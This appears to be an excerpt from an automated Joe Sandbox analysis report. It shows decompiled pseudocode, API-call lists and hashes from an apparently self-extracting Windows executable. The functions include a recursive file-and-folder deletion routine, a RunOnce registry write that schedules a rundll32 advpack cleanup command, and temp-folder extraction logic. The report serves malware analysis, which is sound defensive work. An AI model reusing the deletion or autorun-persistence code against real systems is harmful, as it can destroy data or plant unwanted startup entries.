					E00CE16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00CE1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00CE16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00CE16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00CE658A( &_v280, 0x104, 0xce1140);
								E00CE2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00ce2398
0x00ce239e
0x00ce23a3
0x00ce23a5
0x00ce23ae
0x00ce23b3
0x00ce24cb
0x00ce24d2
0x00ce24d3
0x00ce24d4
0x00ce24df
0x00ce23c2
0x00ce23d1
0x00ce23db
0x00ce23e4
0x00ce23f6
0x00ce23fc
0x00ce2401
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce2407
0x00ce2407
0x00ce2408
0x00ce2411
0x00ce241f
0x00ce247a
0x00ce2483
0x00ce2495
0x00ce24a3
0x00ce2421
0x00ce242f
0x00ce2453
0x00ce245d
0x00ce2466
0x00ce2472
0x00ce2472
0x00ce242f
0x00ce24af
0x00ce24b5
0x00ce24be
0x00ce24c5
0x00000000
0x00ce24c5

APIs

FindFirstFileA.KERNELBASE(?,00CE8A3A,00CE11F4,00CE8A3A,00000000,?,?), ref: 00CE23F6
lstrcmpA.KERNEL32(?,00CE11F8), ref: 00CE2427
lstrcmpA.KERNEL32(?,00CE11FC), ref: 00CE243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00CE2495
DeleteFileA.KERNEL32(?), ref: 00CE24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00CE24AF
FindClose.KERNELBASE(00000000), ref: 00CE24BE
RemoveDirectoryA.KERNELBASE(00CE8A3A), ref: 00CE24C5

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: dcf41031792a23a6c628010c0a7990f263426711275c4456c85de2afda8b1379
Instruction ID: b6d035dbe957eb9aa370ab7769db4b148731c4a1a2daeb443a82cf35d060ad4e
Opcode Fuzzy Hash: dcf41031792a23a6c628010c0a7990f263426711275c4456c85de2afda8b1379
Instruction Fuzzy Hash: C13152326047C09FD320EB65DC8AFEF77ACAFC4315F14492DB95686290EB74AA098752

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CE2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xcea288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xce9124 = 0;
				if(E00CE2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00CE2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00CE52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xce8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xce9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00CE1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xce8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xce9124; // 0x0
				return _t7;
			}

0x00ce2c03
0x00ce2c0d
0x00ce2c18
0x00ce2c20
0x00ce2c2e
0x00ce2c32
0x00ce2c36
0x00ce2c3d
0x00ce2c43
0x00ce2c45
0x00ce2c47
0x00ce2c49
0x00ce2c4e
0x00ce2c4e
0x00ce2c47
0x00ce2c32
0x00ce2c20
0x00ce2c50
0x00ce2c54
0x00ce2c57
0x00ce2c64
0x00ce2c66
0x00ce2c6b
0x00ce2c6d
0x00ce2c74
0x00ce2c76
0x00ce2c7c
0x00ce2c7e
0x00ce2c87
0x00ce2c89
0x00ce2c89
0x00ce2c87
0x00ce2c7c
0x00ce2c74
0x00ce2c8e
0x00ce2c95
0x00ce2c98
0x00ce2c98
0x00ce2c9e
0x00ce2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00CE6BB0,00CE0000,00000000,00000002,0000000A), ref: 00CE2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00CE6BB0,00CE0000,00000000,00000002,0000000A), ref: 00CE2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00CE2C28
CloseHandle.KERNEL32(00000000,?,?,00CE6BB0,00CE0000,00000000,00000002,0000000A), ref: 00CE2C98

Strings

Kernel32.dll, xrefs: 00CE2C13
HeapSetInformation, xrefs: 00CE2C22

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 31f45cbab2b52ad197abad30e0b35558e2308f88dbdb60d512ccaadaa5d3d780
Instruction ID: 84da399fd2243590622eec2d48490bd8564726d293b40298875af0474d923f56
Opcode Fuzzy Hash: 31f45cbab2b52ad197abad30e0b35558e2308f88dbdb60d512ccaadaa5d3d780
Instruction Fuzzy Hash: 181125712003C19FE7246BB7ECC8B2F3B6DDB88380B280025F915EB251CA34EC419661

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE6F40() {

				SetUnhandledExceptionFilter(E00CE6EF0); // executed
				return 0;
			}

0x00ce6f45
0x00ce6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00CE6F45

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7cf42b36416e48ae90c4abb7a2f5b60406ca91d24e98717902f47dda0a725b63
Instruction ID: e897d386feacc95f448a60368b12ee9a05f794b9336407684c36e2ec463bbded
Opcode Fuzzy Hash: 7cf42b36416e48ae90c4abb7a2f5b60406ca91d24e98717902f47dda0a725b63
Instruction Fuzzy Hash: B39002642612808B96101B719D5A62D79915A5E642B815470B011C94D4DB6050405512

Uniqueness

Uniqueness Score: -1.00%

Function 00CE202A Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00CE202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				char _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				char _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xce8004; // 0xd1db73d
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_push( &_v536);
				_push( &_v532);
				_push(0);
				_push(0x2001f);
				_t36 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0); // executed
				if(_t36 != 0) {
					L24:
					return E00CE6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00CE171E(0xce8530, 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					if(RegQueryValueExA(_v532, 0xce8530, 0, 0, 0,  &_v540) != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00CE658A( &_v528, _t84, "advpack.dll");
					_t84 = LoadLibraryA( &_v528);
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xce9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xce91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xce91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xce91e5);
						if(_t90 != 0) {
							 *0xce8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
							E00CE171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, 0xce8530, 0, 1, _t90, _t24);
							RegCloseKey(_v532);
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00CE44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84);
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00CE658A( &_v268, 0x104, 0xce1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xce8530 = _t66;
				goto L23;
			}

0x00ce202a
0x00ce2035
0x00ce203c
0x00ce2041
0x00ce2050
0x00ce205f
0x00ce2064
0x00ce206f
0x00ce2071
0x00ce2078
0x00ce2079
0x00ce207a
0x00ce208c
0x00ce2094
0x00ce2257
0x00ce2266
0x00ce2266
0x00ce209a
0x00ce209b
0x00ce209d
0x00ce20aa
0x00ce20af
0x00ce20d1
0x00000000
0x00000000
0x00ce20d3
0x00ce20da
0x00000000
0x00000000
0x00000000
0x00ce20da
0x00ce20e2
0x00ce2103
0x00ce210e
0x00ce2116
0x00ce2128
0x00ce212c
0x00ce2179
0x00ce2194
0x00ce21de
0x00ce21e4
0x00ce2256
0x00ce2256
0x00000000
0x00ce2256
0x00ce2196
0x00ce2196
0x00ce219c
0x00ce219f
0x00ce219f
0x00ce21a1
0x00ce21a2
0x00ce21a6
0x00ce21a8
0x00ce21b0
0x00ce21b0
0x00ce21b2
0x00ce21b3
0x00ce21bc
0x00ce21c7
0x00ce21cb
0x00ce21f1
0x00ce21f6
0x00ce21fd
0x00ce21ff
0x00ce21ff
0x00ce2204
0x00ce2213
0x00ce2218
0x00ce221d
0x00ce221d
0x00ce2220
0x00ce2220
0x00ce2222
0x00ce2223
0x00ce2229
0x00ce223d
0x00ce2249
0x00ce2250
0x00000000
0x00ce2250
0x00ce21d2
0x00ce21d9
0x00000000
0x00ce21d9
0x00ce213a
0x00ce2141
0x00ce2144
0x00ce214c
0x00000000
0x00000000
0x00ce2163
0x00ce2172
0x00ce2172
0x00000000
0x00ce2163
0x00ce20ea
0x00ce20f0
0x00000000

APIs

memset.MSVCRT ref: 00CE2050
memset.MSVCRT ref: 00CE205F
RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00CE208C

Part of subcall function 00CE171E: _vsnprintf.MSVCRT ref: 00CE1750

RegQueryValueExA.ADVAPI32(?,00CE8530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE20EA
GetSystemDirectoryA.KERNEL32 ref: 00CE2103
LoadLibraryA.KERNEL32(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00CE2134
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE2144
GetSystemDirectoryA.KERNEL32 ref: 00CE215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE21E4
RegSetValueExA.ADVAPI32(?,00CE8530,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00CE223D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00CE2250

Strings

advpack.dll, xrefs: 00CE2109
%s /D:%s, xrefs: 00CE21FF, 00CE2210
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE21A8, 00CE2204
DelNodeRunDLL32, xrefs: 00CE212E
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00CE2082
wextract_cleanup%d, xrefs: 00CE209E
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00CE21F6

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocFileLoadModuleNameOpenProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d
API String ID: 3861571478-2183445182
Opcode ID: 11b73a8b3b5fe9be593c3406f60a119d625bad3e14225c94e63cfc421204b625
Instruction ID: abef8f1c5c158001c20869a4d3c8b141a412abf459da204f7ee861e28ffe6018
Opcode Fuzzy Hash: 11b73a8b3b5fe9be593c3406f60a119d625bad3e14225c94e63cfc421204b625
Instruction Fuzzy Hash: BE51E871A00294AFDB209B62DC89FFE7B7CEB54740F0001A4FA5AEB151DA719E499A50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00CE55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xce8004; // 0xd1db73d
				_v8 = _t28 ^ _t110;
				_t2 = E00CE468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00CE468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xce9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xce8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xce8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00CE6517(_t82, 0x7d2, 0, E00CE3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xce9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xce91e4;
									_t40 = GetTempPathA(0x104, 0xce91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00CE1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00CE6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00CE597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00CE2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00CE658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xce91e4;
																					E00CE1781(0xce91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00CE5467(0xce91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00CE2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00CE597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00CE5467(0xce91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xce91e4;
											_t70 = E00CE2630(0, 0xce91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xce91e4;
												_t71 = E00CE5467(0xce91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00CE597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xce8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00CE5467(0xce8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00CE44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00CE44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xce9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00CE44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xce9124 = E00CE6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00CE6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00ce55ab
0x00ce55b2
0x00ce55c9
0x00ce55d5
0x00ce55d9
0x00ce5600
0x00ce5605
0x00ce560a
0x00ce560c
0x00ce5638
0x00ce5641
0x00ce5643
0x00ce5645
0x00ce5645
0x00ce564c
0x00ce5652
0x00ce5657
0x00ce5659
0x00ce5696
0x00ce569c
0x00ce589f
0x00ce58a7
0x00ce58ac
0x00ce58b3
0x00ce58b5
0x00ce56a2
0x00ce56a2
0x00ce56a8
0x00000000
0x00ce56ae
0x00ce56ae
0x00ce56b9
0x00ce56bf
0x00ce56c1
0x00ce56f3
0x00ce56f3
0x00ce5705
0x00ce570a
0x00ce5711
0x00ce5717
0x00ce5724
0x00ce5726
0x00ce5729
0x00ce5730
0x00ce5737
0x00ce573d
0x00ce5740
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce572b
0x00ce572b
0x00ce572e
0x00ce5742
0x00ce5742
0x00ce5745
0x00ce576b
0x00ce576b
0x00000000
0x00ce5747
0x00ce5747
0x00ce574d
0x00ce574f
0x00ce5771
0x00ce5771
0x00ce5773
0x00000000
0x00ce5751
0x00ce5751
0x00ce5753
0x00000000
0x00ce5755
0x00ce575b
0x00ce5760
0x00ce5762
0x00000000
0x00ce5764
0x00ce5764
0x00ce5769
0x00ce577e
0x00ce577e
0x00ce5781
0x00ce5788
0x00ce578d
0x00ce578f
0x00ce57b2
0x00ce57b8
0x00ce57bd
0x00ce57bf
0x00ce57cd
0x00ce57cd
0x00ce57dd
0x00ce57e3
0x00ce57ef
0x00ce57f5
0x00ce57f8
0x00ce580a
0x00ce580a
0x00ce57fa
0x00ce5802
0x00ce5802
0x00ce580d
0x00ce580f
0x00ce5830
0x00ce5836
0x00ce583d
0x00ce584b
0x00ce5851
0x00ce5855
0x00ce585a
0x00ce585c
0x00000000
0x00ce585e
0x00ce585e
0x00000000
0x00ce585e
0x00ce5811
0x00ce5817
0x00ce5819
0x00ce581f
0x00000000
0x00ce581f
0x00ce5791
0x00ce5797
0x00ce579c
0x00ce579e
0x00000000
0x00ce57a0
0x00ce57a9
0x00ce57ae
0x00ce57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce57b0
0x00ce579e
0x00000000
0x00000000
0x00000000
0x00ce5769
0x00ce5762
0x00ce5753
0x00ce574f
0x00000000
0x00000000
0x00000000
0x00ce572e
0x00000000
0x00ce5864
0x00ce5864
0x00ce5864
0x00ce5717
0x00000000
0x00ce56c3
0x00ce56c5
0x00ce56c9
0x00ce56ce
0x00ce56d0
0x00000000
0x00ce56d6
0x00ce56d6
0x00ce56d8
0x00ce56dd
0x00ce56df
0x00000000
0x00ce56e1
0x00ce56e2
0x00ce56e4
0x00ce56e6
0x00ce56eb
0x00ce56ed
0x00000000
0x00ce56f3
0x00ce56f3
0x00000000
0x00ce586c
0x00ce5878
0x00ce587e
0x00ce5882
0x00ce5883
0x00ce5889
0x00ce588e
0x00ce588e
0x00000000
0x00ce5896
0x00ce56ed
0x00ce56df
0x00ce56d0
0x00ce56c1
0x00ce56a8
0x00ce565b
0x00ce565b
0x00ce565d
0x00ce5669
0x00ce5669
0x00ce565f
0x00ce565f
0x00ce5665
0x00ce5667
0x00000000
0x00000000
0x00ce5667
0x00ce566c
0x00ce5673
0x00ce5678
0x00ce567a
0x00ce589b
0x00ce589b
0x00ce5680
0x00ce5685
0x00ce568c
0x00000000
0x00ce568c
0x00ce567a
0x00ce560e
0x00ce5613
0x00ce561a
0x00ce5620
0x00ce5626
0x00000000
0x00ce5626
0x00ce55db
0x00ce55e0
0x00ce55e7
0x00ce55f1
0x00ce55f6
0x00ce55f6
0x00ce55f6
0x00ce58b7
0x00ce58c7

APIs

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00CE55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00CE5638
LocalFree.KERNEL32(00000000), ref: 00CE564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00CE5620

